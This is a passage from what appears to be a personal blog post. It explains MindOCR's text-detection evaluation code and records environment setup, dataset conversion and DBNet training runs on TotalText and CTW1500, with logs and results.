    "--det_limit_type",
    type=str,
    default="max",
    choices=["min", "max"],
    help="limitation type for image resize. If min, images will be resized by limiting the minimum side length "
    "to `limit_side_len` (prior to accuracy). If max, images will be resized by limiting the maximum side "
    "length to `limit_side_len` (prior to speed). Default: max",
    )
    parser.add_argument(
    "--det_box_type",
    type=str,
    default="quad",
    choices=["quad", "poly"],
    help="box type for text region representation",
    )

    # DB parmas
    parser.add_argument("--det_db_thresh", type=float, default=0.3)
    parser.add_argument("--det_db_box_thresh", type=float, default=0.6)
    parser.add_argument("--det_db_unclip_ratio", type=float, default=1.5)
    parser.add_argument("--max_batch_size", type=int, default=10)
    parser.add_argument("--use_dilation", type=str2bool, default=False)
    parser.add_argument("--det_db_score_mode", type=str, default="fast")

    # params for text recognizer
    parser.add_argument(
    "--rec_algorithm",
    type=str,
    default="CRNN",
    choices=["CRNN", "RARE", "CRNN_CH", "RARE_CH", "SVTR"],
    help="recognition algorithm",
    )
    parser.add_argument(
    "--rec_amp_level",
    type=str,
    default="O0",
    choices=["O0", "O1", "O2", "O3"],
    help="Auto Mixed Precision level. This setting only works on GPU and Ascend",
    ) # added
    parser.add_argument(
    "--rec_model_dir",
    type=str,
    help="directory containing the recognition model checkpoint best.ckpt, or path to a specific checkpoint file.",
    ) # determine the network weights
    # parser.add_argument("--rec_image_inverse", type=str2bool, default=True)
    parser.add_argument(
    "--rec_image_shape",
    type=str,
    default="3, 32, 320",
    help="C, H, W for target image shape. max_wh_ratio=W/H will be used to control the maximum width after "
    '"aspect-ratio-kept" resizing. Set W larger for longer text.',
    )

    parser.add_argument(
    "--rec_batch_mode",
    type=str2bool,
    default=True,
    help="Whether to run recognition inference in batch-mode, which is faster but may degrade the accuracy "
    "due to padding or resizing to the same shape.",
    ) # added
    parser.add_argument("--rec_batch_num", type=int, default=8)
    parser.add_argument("--max_text_length", type=int, default=25)
    parser.add_argument(
    "--rec_char_dict_path",
    type=str,
    default=None,
    help="path to character dictionary. If None, will pick according to rec_algorithm and red_model_dir.",
    )
    # uncomment it after model trained supporting space recognition.
    # parser.add_argument("--use_space_char", type=str2bool, default=True)
    parser.add_argument("--vis_font_path", type=str, default="docs/fonts/simfang.ttf")
    parser.add_argument("--drop_score", type=float, default=0.5)
    parser.add_argument(
    "--rec_gt_path", type=str, default=None, help="Path to ground truth labels of the recognition result"
    ) # added

    #
    parser.add_argument(
    "--draw_img_save_dir",
    type=str,
    default="./inference_results",
    help="Dir to save visualization and detection/recogintion/system prediction results",
    )
    parser.add_argument(
    "--save_crop_res",
    type=str2bool,
    default=False,
    help="Whether to save images cropped from text detection results.",
    )
    parser.add_argument(
    "--crop_res_save_dir", type=str, default="./output", help="Dir to save the cropped images for text boxes"
    )
    parser.add_argument(
    "--visualize_output",
    type=str2bool,
    default=False,
    help="Whether to visualize results and save the visualized image.",
    )
    parser.add_argument("--warmup", type=str2bool, default=False)

    return parser_config, parser

    评估(8.2)

    metrics/det_metrics.py 下存储着评估协议:

    from typing import List, Tuple

    import numpy as np
    from shapely.geometry import Polygon

    import mindspore as ms
    import mindspore.ops as ops
    from mindspore import Tensor, ms_function, nn

    __all__ = ["DetMetric"]

    这段代码是一个在 mindocr(MindSpore OCR)评估模型中使用的模块。以下是对代码的解释:

    • from typing import List, Tuple:导入类型提示(Type Hints),用于指定函数参数和返回值的类型。
    • import numpy as np:导入 NumPy 库,用于进行数值计算和数组操作。
    • from shapely.geometry import Polygon:从 shapely.geometry 模块中导入 Polygon 类,用于处理多边形几何对象。
    • import mindspore as ms:导入 MindSpore 库,一个开源的深度学习框架。
    • import mindspore.ops as ops:导入 MindSpore 框架的操作模块,用于执行各种操作。
    • from mindspore import Tensor, ms_function, nn:从 MindSpore 中导入 Tensor、ms_function 和 nn,它们是 MindSpore 框架提供的一些基础类和装饰器。
    • __all__ = ["DetMetric"]:定义了一个名为 __all__ 的变量,其中包含字符串 “DetMetric”。这表示该模块中只导出 DetMetric 类,其他变量和函数不会被导入。

    这段代码主要是导入所需的依赖库和模块,为之后的代码提供必要的支持。在 MindOCR 评估模型中,这些导入的模块和类可能用于数据处理、模型定义、评估和计算等方面的操作。

    def _get_intersect(pd, pg):
    return pd.intersection(pg).area

    这段代码定义了一个名为 _get_intersect 的函数,该函数接受两个参数 pdpg,并返回它们的交集面积。

    • pdpg 参数都是多边形(Polygon)对象,可能是由 shapely.geometry.Polygon 创建的。
    • pd.intersection(pg) 表示计算 pdpg 的交集,返回一个新的多边形对象。
    • .area 是对交集多边形对象调用的方法,用于计算其面积。
    • 函数将交集多边形的面积作为结果进行返回。

    此函数的目的是计算两个多边形的交集并返回其面积。在 MindOCR 评估模型中,这个函数可能被用于计算检测框与标注框之间的交集面积,用于评估模型的准确度和性能。

    def _get_iou(pd, pg):
    return pd.intersection(pg).area / pd.union(pg).area

    这段代码定义了一个名为 _get_iou 的函数,该函数接受两个参数 pdpg,并返回它们的交并比(Intersection over Union,IoU)。

    • pdpg 参数都是多边形(Polygon)对象,可能是由 shapely.geometry.Polygon 创建的。
    • pd.intersection(pg) 表示计算 pdpg 的交集,返回一个新的多边形对象。
    • .area 是对交集多边形对象和并集多边形对象进行调用的方法,分别用于计算其面积。
    • / 运算符将两个面积相除,得到交并比(IoU)。
    • 函数将交并比作为结果进行返回。

    交并比是用于衡量两个集合重叠程度的指标。在目标检测任务中,常用于评估模型检测结果与真实标注框之间的匹配程度。在该评估模型中,_get_iou 函数可能被用于计算检测框与标注框之间的交并比,以评估模型的准确度和性能。

    class DetectionIoUEvaluator:
    """
    Converts ground truth and predicted polygon locations into binary classification labels based on
    the IoU between them. This simplifies metric calculations, such as Recall, Precision, etc.
    根据真实标注和预测多边形之间的交并比(IoU),将它们转换为二元分类标签。这简化了召回率、精确率等度量计算的过程。

    Args:
    min_iou: Minimum IoU between the ground truth and prediction to be considered as a correct prediction.
    min_iou: 在考虑为正确预测的情况下,真实标注和预测之间的最小交并比(IoU)。
    min_intersect: Minimum intersection with an ignored ground truth for the prediction to be considered as ignored
    (and thus to be excluded from further calculations).
    min_intersect: 忽略的真实标注与预测之间的最小交集,以使预测被视为被忽略(从而在后续计算中排除)。
    """

    def __init__(self, min_iou: float = 0.5, min_intersect: float = 0.5):
    self._min_iou = min_iou
    self._min_intersect = min_intersect

    def __call__(self, gt: List[dict], preds: List[np.ndarray]) -> Tuple[List[int], List[int]]:
    """
    Converts GT and predicted polygons into binary classification labels, where 1 is positive and 0 is negative.
    将真实标注和预测多边形转换为二元分类标签,其中 1 表示正样本,0 表示负样本。

    Args:
    gt: list of ground truth dictionaries with keys: "polys" and "ignore".
    gt:包含真实标注字典的列表,每个字典中包含键 "polys" 和 "ignore"。其中,"polys" 表示真实标注的多边形信息,"ignore" 表示是否将该标注忽略。
    preds: list of predicted by a model polygons.
    preds:由模型预测的多边形列表。
    Returns:
    binary labels for the ground truth and predicted polygons.
    """
    # filter invalid groundtruth polygons and split them into useful and ignored
    gt_polys, gt_ignore = [], []
    for sample in gt:
    poly = Polygon(sample["polys"])
    if poly.is_valid and poly.is_simple:
    if not sample["ignore"]:
    gt_polys.append(poly)
    else:
    gt_ignore.append(poly)

    # repeat the same step for the predicted polygons
    det_polys, det_ignore = [], []
    for pred in preds:
    poly = Polygon(pred)
    if poly.is_valid and poly.is_simple:
    poly_area = poly.area
    if gt_ignore and poly_area > 0:
    for ignore_poly in gt_ignore:
    intersect_area = _get_intersect(ignore_poly, poly)
    precision = intersect_area / poly_area
    # If precision enough, append as ignored detection
    if precision > self._min_intersect:
    det_ignore.append(poly)
    break
    else:
    det_polys.append(poly)
    else:
    det_polys.append(poly)

    det_labels = [0] * len(gt_polys)
    if det_polys:
    iou_mat = np.zeros([len(gt_polys), len(det_polys)])
    det_rect_mat = np.zeros(len(det_polys), np.int8)

    for det_idx in range(len(det_polys)):
    if det_rect_mat[det_idx] == 0: # the match is not found yet
    for gt_idx in range(len(gt_polys)):
    iou_mat[gt_idx, det_idx] = _get_iou(det_polys[det_idx], gt_polys[gt_idx])
    if iou_mat[gt_idx, det_idx] > self._min_iou:
    # Mark the visit arrays
    det_rect_mat[det_idx] = 1
    det_labels[gt_idx] = 1
    break
    else:
    det_labels.append(1)

    gt_labels = [1] * len(gt_polys) + [0] * (len(det_labels) - len(gt_polys))
    return gt_labels, det_labels

    这段代码定义了一个名为 DetectionIoUEvaluator 的类,用于将真实的多边形位置和预测的多边形位置转换为二元分类标签,以便进行度量计算,如召回率、精确率等。

    该类有两个参数:

    • min_iou:真实值和预测值之间的最小交并比(Intersection over Union,IoU),用于被视为正确预测的阈值。
    • min_intersect:与被忽略的真实值的最小交集,用于被视为忽略的预测(从而在进一步计算中排除)的阈值。

    类的构造函数 __init__ 接受这两个参数,并将它们保存为类的属性。

    类还实现了 __call__ 方法,接受两个参数 gtpreds,分别表示真实的多边形和预测的多边形。

    该方法首先过滤掉无效的真实多边形,并将它们分为有效多边形和被忽略的多边形。然后对预测多边形进行相同的处理。

    接下来,对每个预测多边形,如果存在被忽略的真实多边形,并且预测多边形的面积大于 0,则计算它与每个被忽略的真实多边形的交集面积,并计算交集面积占预测多边形面积的比例(即 precision)。如果 precision 大于设定的阈值 min_intersect,则将该预测多边形视为被忽略的预测;否则将其视为有效预测。

    然后,将每个有效预测多边形与真实多边形计算交并比(IoU),如果交并比大于设定的阈值 min_iou,则将该真实多边形标记为正样本。

    最后,根据标记结果生成二元分类标签,其中 1 表示正样本,0 表示负样本。返回真实多边形的标签和预测多边形的标签。

    该类可能用于目标检测任务中,用于根据交并比将模型的预测结果与真实标注进行匹配,并计算度量指标(如召回率、精确率)以评估模型性能。

    class DetMetric(nn.Metric):
    """
    Calculate Recall, Precision, and F-score for predicted polygons given ground truth.
    给定真实标注,计算预测多边形的召回率、精确率和 F1 分数。

    Args:
    device_num: number of devices used in the metric calculation.
    """

    def __init__(self, device_num: int = 1, **kwargs):
    super().__init__()
    self._evaluator = DetectionIoUEvaluator()
    self._gt_labels, self._det_labels = [], []
    self.device_num = device_num
    self.all_reduce = None if device_num == 1 else ops.AllReduce()
    self.metric_names = ["recall", "precision", "f-score"]

    def clear(self):
    self._gt_labels, self._det_labels = [], []

    def update(self, *inputs):
    """
    Compute the metrics on a single batch of data.

    Args:
    inputs (tuple): contain two elements preds, gt
    preds (dict): text detection prediction as a dictionary with keys:
    polys: np.ndarray of shape (N, K, 4, 2)
    score: np.ndarray of shape (N, K), confidence score
    gts (tuple): ground truth
    - (polygons, ignore_tags), where polygons are in shape [num_images, num_boxes, 4, 2],
    ignore_tags are in shape [num_images, num_boxes], which can be defined by output_columns in yaml
    """
    preds, gts = inputs
    preds = preds["polys"]
    polys, ignore = gts[0].asnumpy().astype(np.float32), gts[1].asnumpy()

    for sample_id in range(len(polys)):
    gt = [{"polys": poly, "ignore": ig} for poly, ig in zip(polys[sample_id], ignore[sample_id])]
    gt_label, det_label = self._evaluator(gt, preds[sample_id])
    self._gt_labels.append(gt_label)
    self._det_labels.append(det_label)

    @ms_function
    def all_reduce_fun(self, x):
    res = self.all_reduce(x)
    return res

    def cal_matrix(self, det_lst, gt_lst):
    tp = np.sum((gt_lst == 1) * (det_lst == 1))
    fn = np.sum((gt_lst == 1) * (det_lst == 0))
    fp = np.sum((gt_lst == 0) * (det_lst == 1))
    return tp, fp, fn

    def eval(self) -> dict:
    """
    Evaluate by aggregating results from all batches.

    Returns:
    average recall, precision, f1-score of all samples.
    """
    # flatten predictions and labels into 1D-array
    self._det_labels = np.array([lbl for label in self._det_labels for lbl in label])
    self._gt_labels = np.array([lbl for label in self._gt_labels for lbl in label])

    tp, fp, fn = self.cal_matrix(self._det_labels, self._gt_labels)
    if self.all_reduce:
    tp = float(self.all_reduce_fun(Tensor(tp, ms.float32)).asnumpy())
    fp = float(self.all_reduce_fun(Tensor(fp, ms.float32)).asnumpy())
    fn = float(self.all_reduce_fun(Tensor(fn, ms.float32)).asnumpy())

    recall = _safe_divide(tp, (tp + fn))
    precision = _safe_divide(tp, (tp + fp))
    f_score = _safe_divide(2 * recall * precision, (recall + precision))
    return {"recall": recall, "precision": precision, "f-score": f_score}

    这段代码定义了一个名为 DetMetric 的类,用于计算预测的多边形与真实标注之间的召回率、精确率和 F1 分数。

    该类继承自 nn.Metric,并具有以下几个方法和属性:

    • __init__(self, device_num: int = 1, **kwargs):类的构造函数,接受一个整数参数 device_num,表示用于计算度量的设备数量。初始化了一个 DetectionIoUEvaluator 对象作为度量计算的评估器,并初始化了一些其他属性。
    • clear(self):清空保存的真实标签和预测标签。
    • update(self, *inputs):在单个数据批次上计算度量。接受两个输入参数,predsgtspreds 是一个字典,包含键为 “polys” 和 “score” 的两个项,分别表示预测的多边形和置信度得分。gts 是一个元组,其中包含真实标注的多边形和忽略标签。对每个样本,将真实标注和预测的多边形传递给 DetectionIoUEvaluator 对象进行评估,并保存得到的标签。
    • all_reduce_fun(self, x):用于分布式计算中的全局归约操作的函数。
    • cal_matrix(self, det_lst, gt_lst):计算真阳性(True Positive),假阳性(False Positive)和假阴性(False Negative)的数量。
    • eval(self) -> dict:在所有批次上评估度量,并返回平均召回率、精确率和 F1 分数。

    其中,_safe_divide 函数用于安全地进行除法运算,避免除以零的情况。

    该类可能用于目标检测任务中,通过对比预测的多边形和真实标注的多边形,计算模型的召回率、精确率和 F1 分数,以评估模型性能。

    def _safe_divide(numerator, denominator, val_if_zero_divide=0.0):
    if denominator == 0:
    return val_if_zero_divide
    else:
    return numerator / denominator

    _safe_divide 是一个辅助函数,用于进行除法运算并安全处理分母为零的情况。它接受三个参数:numerator(分子)、denominator(分母)和 val_if_zero_divide(当分母为零时的返回值,默认为 0.0)。

    函数的逻辑如下:

    • 如果分母 denominator 等于零,则返回 val_if_zero_divide
    • 否则,返回 numerator / denominator

    该函数的作用是避免在除法运算中出现分母为零的错误,当分母为零时,可以选择返回一个指定的默认值,以免影响后续计算。

    BlenderText

    ]]>
    + 资源

Getting it running

Getting the code

On my own machine, download mindocr-main.zip from mindocr: MindOCR is an open-source toolbox for OCR development and application based on MindSpore. It helps users to train and apply the best text detection and recognition models, such as DBNet/DBNet++ and CR (gitee.com), then copy it to work/ on the server.

Unzip it:

unzip mindocr-main.zip

This extracts a mindocr-main folder; rename it to mindocr.
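For the record, the rename is a one-liner (assuming you are in work/):

mv mindocr-main mindocr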

Creating the environment

Grab a mindspore:2.0.2-alpha image from the AI computing center and open it.

Create a virtual environment:

source activate base
conda create -n mindocr --clone base
conda activate mindocr

Check that MindSpore actually works:

python -c "import mindspore;mindspore.run_check()"

MindSpore version:  2.0.0a0
The result of multiplication calculation is correct, MindSpore has been installed successfully!

Installing dependencies

Since installing lanms is a bit of a trap, get it sorted first:

pip install lanms-neo

Then delete the lanms line from requirements.txt.
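One non-interactive way to do that (assumes GNU sed and that the line starts with "lanms"):

sed -i '/^lanms/d' requirements.txt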

    work/ 目录下:

cd mindocr
pip install -e .

Successfully built mindocr
Installing collected packages: pyclipper, lmdb, xml-python, shapely, rapidfuzz, opencv-python-headless, mindocr
Successfully installed lmdb-1.4.1 mindocr-0.2.0 opencv-python-headless-4.8.0.74 pyclipper-1.3.0.post4 rapidfuzz-3.1.1 shapely-2.0.1 xml-python-0.4.3

Converting the datasets

TotalText

On Windows, download totaltext.zip from the images link (size = 441 MB) and txt_format.zip from the annotations (.txt format) link.

Unzip both archives and organize their contents like this:

totaltext
├── Images
│   ├── Train
│   │   ├── img11.jpg
│   │   ├── img12.jpg
│   │   ├── ...(1255 files)
│   ├── Test
│   │   ├── img1.jpg
│   │   ├── img2.jpg
│   │   ├── ...(300 files)
├── Txts
│   ├── Train
│   │   ├── poly_gt_img11.txt
│   │   ├── poly_gt_img12.txt
│   │   ├── ...(1255 files)
│   ├── Test
│   │   ├── poly_gt_img1.txt
│   │   ├── poly_gt_img2.txt
│   │   ├── ...(300 files)

Then zip it back up as totaltext.zip, upload it to the server, and unzip it (unzip command) into the corresponding directory data/ocr_datasets/:

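The round trip, sketched (assuming the archive lands in work/ and data/ocr_datasets/ already exists):

zip -r totaltext.zip totaltext              # on the local machine
unzip totaltext.zip -d data/ocr_datasets/   # on the server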

Back in the mindocr/ directory, start converting the dataset:

    • Train
python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/totaltext/Images/Train/ \
    --label_dir ./data/ocr_datasets/totaltext/Txts/Train/ \
    --output_path ./data/ocr_datasets/totaltext/train_det_gt.txt

Warning img1075.jpg: skipping invalid polygon [[221, 208]]
Warning img1083.jpg: skipping invalid polygon [[534, 294]]
Warning img114.jpg: skipping invalid polygon [[606, 697]]
Warning img1304.jpg: skipping invalid polygon [[718, 303]]
Warning img1474.jpg: skipping invalid polygon [[413, 792]]
Warning img1489.jpg: skipping invalid polygon [[472, 1035]]
Warning img700.jpg: skipping invalid polygon [[802, 1175]]
Warning img759.jpg: skipping invalid polygon [[5, 984]]
Warning img839.jpg: skipping invalid polygon [[491, 1052]]
Warning img949.jpg: skipping invalid polygon [[947, 324]]
Conversion complete.
Result saved in ./data/ocr_datasets/totaltext/train_det_gt.txt
    • Test
python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/totaltext/Images/Test \
    --label_dir ./data/ocr_datasets/totaltext/Txts/Test \
    --output_path ./data/ocr_datasets/totaltext/test_det_gt.txt

Warning img664.jpg: skipping invalid polygon [[5, 340]]
Conversion complete.
Result saved in ./data/ocr_datasets/totaltext/test_det_gt.txt

This yields the dataset in the expected format:

totaltext
├── Images
│   ├── Train
│   │   ├── img1001.jpg
│   │   ├── img1002.jpg
│   │   ├── ...
│   ├── Test
│   │   ├── img1.jpg
│   │   ├── img2.jpg
│   │   ├── ...
├── test_det_gt.txt
├── train_det_gt.txt
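For reference, each line of the generated train_det_gt.txt / test_det_gt.txt pairs an image filename with a JSON list of polygon annotations. A hypothetical line (field names taken from the ground-truth sample shown in the inference section later in this post) would look like:

img11.jpg	[{"transcription": "SOME TEXT", "points": [[57, 240], [104, 247], [151, 248]]}]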

    CTW1500

Download the archives from Yuliang-Liu/Curve-Text-Detector: This repository provides train&test code, dataset, det.&rec. annotation, evaluation script, annotation tool, and ranking. (github.com) and unzip them into this layout:


ctw1500
├── ctw1500_train_labels
│   ├── 0001.xml
│   ├── 0002.xml
│   ├── ...
├── gt_ctw_1500
│   ├── 0001001.txt
│   ├── 0001002.txt
│   ├── ...
├── test_images
│   ├── 1001.jpg
│   ├── 1002.jpg
│   ├── ...
├── train_images
│   ├── 0001.jpg
│   ├── 0002.jpg
│   ├── ...

Re-pack the ctw1500 folder as ctw1500.zip, drop it on the server, and unzip it:


    mindocr/ 下执行转换命令:

    • Train
python tools/dataset_converters/convert.py \
    --dataset_name ctw1500 \
    --task det \
    --image_dir ./data/ocr_datasets/ctw1500/train_images/ \
    --label_dir ./data/ocr_datasets/ctw1500/ctw1500_train_labels/ \
    --output_path ./data/ocr_datasets/ctw1500/train_det_gt.txt
    • Test
python tools/dataset_converters/convert.py \
    --dataset_name ctw1500 \
    --task det \
    --image_dir ./data/ocr_datasets/ctw1500/test_images/ \
    --label_dir ./data/ocr_datasets/ctw1500/gt_ctw1500/ \
    --output_path ./data/ocr_datasets/ctw1500/test_det_gt.txt

My own dataset

Convert my own dataset into the totaltext format:

    • Train
python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/blendertext/images/Train/ \
    --label_dir ./data/ocr_datasets/blendertext/Txts/Train/ \
    --output_path ./data/ocr_datasets/blendertext/train_det_gt.txt
    • Test
python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/blendertext/images/Test \
    --label_dir ./data/ocr_datasets/blendertext/Txts/Test \
    --output_path ./data/ocr_datasets/blendertext/test_det_gt.txt

Training

db_r18_totaltext (not as good as the official numbers, but usable) (7.12-7.14)

First, fix the dataset path in configs/det/dbnet/db_r18_totaltext.yaml. (I didn't want to touch the config at all, but the default is an absolute path that isn't under work/, so it had to change.)

Set dataset_root under both train: dataset: and test: dataset: to your own dataset path; for me that is:

dataset_root: ./data/ocr_datasets
Single-card training (worked)

For single-card training, make sure the distribute parameter in the yaml is False. (emmmm, although True doesn't seem to break anything either.)

# train dbnet on totaltext dataset
python tools/train.py --config configs/det/dbnet/db_r18_totaltext.yaml
[2023-07-12 16:40:01] mindocr.train INFO - Standalone training. Device id: 0, specified by system.device_id in yaml config file or is default value 0.
[2023-07-12 16:40:07] mindocr.data.builder INFO - Creating dataloader (training=True) for device 0. Number of data samples: 1255
[2023-07-12 16:40:10] mindocr.data.builder INFO - Creating dataloader (training=False) for device 0. Number of data samples: 300
[2023-07-12 16:40:13] mindocr.models.backbones.mindcv_models.utils INFO - Finish loading model checkpoint from: /home/ma-user/.mindspore/models/resnet18-1e65cd21.ckpt
[2023-07-12 16:40:13] mindocr.models.utils.load_model INFO - Finish loading model checkoint from https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet18_synthtext-251ef3dd.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
[2023-07-12 16:40:13] mindocr.optim.param_grouping INFO - no parameter grouping is applied.
[2023-07-12 16:40:20] mindocr.train INFO -
========================================
Distribute: False
Model: det_resnet18-DBFPN-DBHead
Total number of parameters: 12351042
Total number of trainable parameters: 12340930
Data root: ./data/ocr_datasets
Optimizer: SGD
Weight decay: 0.0001
Batch size: 20
Num devices: 1
Gradient accumulation steps: 1
Global batch size: 20x1x1=20
LR: 0.007
Scheduler: polynomial_decay
Steps per epoch: 62
Num epochs: 1200
Clip gradient: False
EMA: True
AMP level: O0
Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
Drop overflow update: False
========================================

Start training... (The first epoch takes longer, please wait...)

[2023-07-12 16:42:13] mindocr.utils.callbacks INFO - epoch: [1/1200], loss: 2.851490, epoch time: 113.039s, per step time: 1823.213ms, fps per card: 10.97 img/s

Goddammit, the README.md is vague as hell, but it finally runs. And that "the first epoch takes longer" really is quite a lot longer...

Funny enough, the lab PC dying in the middle of the night forced me to learn checkpoint resumption

Halfway through training, MobaXterm actually crashed?! So now I need resume-from-checkpoint, orz: docs/cn/tutorials/advanced_train.md · MindSpore Lab/mindocr - Gitee.com

Add the following under model: in db_r18_totaltext.yaml:

resume: True


Then run again:

python tools/train.py --config configs/det/dbnet/db_r18_totaltext.yaml

It prints:

Resume train from epoch: 1049

And training continues!

Analyzing the training results

Final results:

[2023-07-14 10:27:56] mindocr.utils.callbacks INFO - => Best f-score: 0.8407643312101911
Training completed!
[2023-07-14 10:27:56] mindocr.utils.callbacks INFO - Top K checkpoints:
f-score   checkpoint
0.8408    ./tmp_det/e1110.ckpt
0.8401    ./tmp_det/e1090.ckpt
0.8397    ./tmp_det/e1086.ckpt
0.8397    ./tmp_det/e1089.ckpt
0.8394    ./tmp_det/e1126.ckpt
0.8392    ./tmp_det/e1132.ckpt
0.8392    ./tmp_det/e1149.ckpt
0.8390    ./tmp_det/e1152.ckpt
0.8389    ./tmp_det/e1129.ckpt
0.8389    ./tmp_det/e1139.ckpt

Under tmp_det/ you can find the outputs: the trained checkpoints (the "pills" from this alchemy run), the logs, and so on.

The epoch-1110 checkpoint performs best!

Epoch | Loss | Recall | Precision | F-score
1110 | 1.139845 | 83.43% | 84.73% | 84.08%

emmmm, the official final numbers are:

Model | Environment | Backbone | Pretrained on | Recall | Precision | F-score | Train time | Throughput | Config | Weights
DBNet | D910x1-MS2.0-G | ResNet-18 | SynthText | 83.66% | 87.65% | 85.61% | 12.9 s/epoch | 96.9 img/s | yaml | ckpt

Let's write a bit of Python to read result.log and plot the curves:

import matplotlib.pyplot as plt

# one list per metric column in result.log (loss, recall, precision, f-score, ...)
data = [[], [], [], [], [], []]
epochs = 0
with open('result.log', 'r') as file:
    lines = file.readlines()
    epochs = len(lines) - 1  # the first line is the header
    for line in lines[1:]:
        # column 0 is the epoch index; collect the remaining columns
        for i in range(1, len(line.strip().split())):
            data[i-1].append(float(line.strip().split()[i]))

fig, axs = plt.subplots(nrows=2, ncols=3)

for i, ax in enumerate(axs.flat):
    ax.plot(range(1, epochs + 1), data[i])
    ax.set_xticks([0, epochs * 1 / 3, epochs * 2 / 3, epochs])
    ax.set_title(lines[0][:-1].split('\t')[i + 1])  # column name from the header
    ax.set_xlabel('Epoch')
    ax.set_ylabel('')

plt.tight_layout()

plt.show()


We can see that:

• loss steadily decreases
• recall gradually approaches 1
• precision gradually decreases? Is that OK? (ChatGPT says it is normal; see the sketch after this list)

When training deep neural networks, precision and the F1 score both measure classification performance.

• Precision is the fraction of samples predicted positive that really are positive; it measures how trustworthy the positive predictions are.
• The F1 score combines recall and precision as their harmonic mean; an F1 close to 1 means the model keeps both precision and recall high.

During training it is entirely possible for precision to fall while the F1 score keeps creeping toward 1, especially when the model leans toward recall (catching as many positives as it can). This tends to happen with imbalanced labels or classes, or with high false-positive or false-negative rates.

In that case the model predicts more samples as positive, so false positives rise and precision drops; but because the predictions lean positive, more true positives get caught and recall improves. The F1 score can therefore still approach 1, indicating the model's overall classification performance remains decent.

Of course, for a concrete problem and dataset you still have to judge case by case whether the performance meets your requirements.

• f-score gradually approaches 1

• train_time is slow at the very beginning, and restarting training at epoch 1049 burned a pile of time, orz
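To make the trade-off concrete, here is a minimal sketch (with invented counts) of how recall, precision and F-score fall out of TP/FP/FN, mirroring what DetMetric computes in the evaluation section below:

# toy counts, purely illustrative
tp, fp, fn = 80, 30, 10

recall = tp / (tp + fn)        # 80 / 90  ~= 0.889
precision = tp / (tp + fp)     # 80 / 110 ~= 0.727
# F-score is the harmonic mean of the two
f_score = 2 * recall * precision / (recall + precision)  # ~= 0.800

print(f"recall={recall:.3f}, precision={precision:.3f}, f-score={f_score:.3f}")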

Performance at epoch 800 in the original paper:

Method | P | R | F
DB-ResNet-18 (800) | 88.3 | 77.9 | 82.8

Performance at epoch 800 from my result.log:

Method | P | R | F
DB-ResNet-18 (800) | 85.0 | 83.2 | 84.0

Good grief, training this thing cost me over 665 RMB...

Distributed training (dead)

You also have to install openmpi 4.0.3 (for distributed training/evaluation).

Download https://download.open-mpi.org/release/open-mpi/v4.0/openmpi-4.0.3.tar.gz, copy it to the server, and run the usual incantation:

gunzip -c openmpi-4.0.3.tar.gz | tar xf -
cd openmpi-4.0.3
./configure --prefix=/usr/local
<...lots of output...>
make all install

And then it promptly rewards you with an install failure.

Asked the support staff; no solution so far...

Some other day I'll try the RANK_TABLE_FILE approach.

db_r18_ctw1500 (runs, but never finished) (7.14)

First fix the dataset path in configs/det/dbnet/db_r18_ctw1500.yaml:

Set dataset_root under train: dataset: and test: dataset: to your own dataset path:

dataset_root: ./data/ocr_datasets

Run it!

python tools/train.py --config configs/det/dbnet/db_r18_ctw1500.yaml
[2023-07-14 10:57:25] mindocr.models.utils.load_model INFO - Finish loading model checkoint from https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet18_synthtext-251ef3dd.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
[2023-07-14 10:57:25] mindocr.optim.param_grouping INFO - no parameter grouping is applied.
[2023-07-14 10:57:31] mindocr.train INFO -
========================================
Distribute: False
Model: det_resnet18-DBFPN-DBHead
Total number of parameters: 12351042
Total number of trainable parameters: 12340930
Data root: ./data/ocr_datasets
Optimizer: SGD
Weight decay: 0.0001
Batch size: 20
Num devices: 1
Gradient accumulation steps: 1
Global batch size: 20x1x1=20
LR: 0.007
Scheduler: polynomial_decay
Steps per epoch: 50
Num epochs: 1200
Clip gradient: False
EMA: False
AMP level: O0
Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
Drop overflow update: False
========================================

Start training... (The first epoch takes longer, please wait...)

[WARNING] MD(9900,fffb197fa1e0,python):2023-07-14-10:58:45.969.430 [mindspore/ccsrc/minddata/dataset/engine/datasetops/data_queue_op.cc:832] DetectPerBatchTime] Bad performance attention, it takes more than 25 seconds to fetch a batch of data from dataset pipeline, which might result `GetNext` timeout problem. You may test dataset processing performance(with creating dataset iterator) and optimize it.
[2023-07-14 10:59:43] mindocr.utils.callbacks INFO - epoch: [1/1200], loss: 2.689226, epoch time: 132.242 s, per step time: 2644.840 ms, fps per card: 7.56 img/s
100%|████████████████████████████████████████████████████████| 500/500 [00:59<00:00, 8.42it/s]
[2023-07-14 11:00:43] mindocr.utils.callbacks INFO - Performance: {'recall': 0.8184523809523809, 'precision': 0.8520526723470179, 'f-score': 0.8349146110056926}, eval time: 59.413748025894165
[2023-07-14 11:00:43] mindocr.utils.callbacks INFO - => Best f-score: 0.8349146110056926, checkpoint saved.

But this time I want it running in the server's background, to avoid a repeat of the MobaXterm-dropping-at-midnight embarrassment:

nohup python tools/train.py --config configs/det/dbnet/db_r18_ctw1500.yaml > test_db_r18_ctw1500.log 2>&1 &
A breakdown of the general pattern (the -u / test.py / test.log parts describe the generic recipe, not the exact command above):

• the trailing "&" runs the program in the background

• "nohup" keeps the program from being hung up when the terminal session closes

• "python" runs the Python interpreter

• "-u" disables output buffering, so print output reaches the log file in real time (without -u, the log may lag behind the code's print calls)

• "test.py" is the Python source file (substitute your own)

• "test.log" is the output log file (name it whatever you like)

• ">" redirects the printed output into the log file

• "2>&1" redirects stderr into stdout, so error messages also land in the log (0 -> stdin, 1 -> stdout, 2 -> stderr)

The ever-awesome Wei-ge points out:

With this approach, if you want to stop midway, your only option is to kill the process;

otherwise you just wait for it to finish.

So rebooting the server outright also does the job.
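For the record, stopping the background job looks something like this (a sketch; assumes the train.py command line is unique enough to grep for):

ps -ef | grep "tools/train.py" | grep -v grep    # find the PID
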